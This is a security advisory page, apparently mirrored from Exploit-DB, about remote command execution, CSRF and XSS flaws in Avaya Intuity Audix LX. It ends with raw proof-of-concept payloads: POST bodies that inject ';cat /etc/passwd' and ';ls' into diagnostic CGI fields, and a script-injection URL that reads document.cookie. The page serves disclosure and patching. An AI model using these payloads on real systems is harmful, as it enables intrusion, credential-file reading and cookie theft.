Avaya Intuity Audix LX Multiple Remote Vulnerabilities

vendor:

Intuity Audix LX

by:

SecurityFocus

9.3

CVSS

HIGH

Multiple Remote Command-Execution, Cross-Site Request-Forgery, Cross-Site Scripting

78, 352, 79

CWE

Product Name: Intuity Audix LX

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Avaya Intuity Audix LX Multiple Remote Vulnerabilities

Avaya Intuity Audix LX is prone to multiple remote vulnerabilities, including multiple remote command-execution vulnerabilities, a cross-site request-forgery vulnerability, and a cross-site scripting vulnerability. Attackers can exploit these issues to execute arbitrary commands with the privileges of 'vexvm' on the underlying system, steal cookie-based authentication credentials, execute arbitrary script code, and perform administrative tasks. Other attacks are also possible.

Mitigation:

Users should apply the appropriate updates from the vendor to address these issues.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/36450/info

Avaya Intuity Audix LX is prone to multiple remote vulnerabilities, including:

1. Multiple remote command-execution vulnerabilities
2. A cross-site request-forgery vulnerability
3. A cross-site scripting vulnerability

Attackers can exploit these issues to execute arbitrary commands with the privileges of 'vexvm' on the underlying system, steal cookie-based authentication credentials, execute arbitrary script code, and perform administrative tasks. Other attacks are also possible. 

POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=127.0.0.1;cat+/etc/passwd&count_p=1&size_p=56

POST https://www.example.com/cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=;cat+/etc/passwd

POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=&count_p=1;ls&size_p=56

POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=&count_p=1&size_p=56&opt_n=;ls

POST /cswebadm/diag/cgi-bin/nslookup.pl HTTP/1.1
host_or_ip=127.0.0.1&r_type=;ls;

https://www.example.com/cgi-bin/smallmenu.pl?url=%3C/
title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E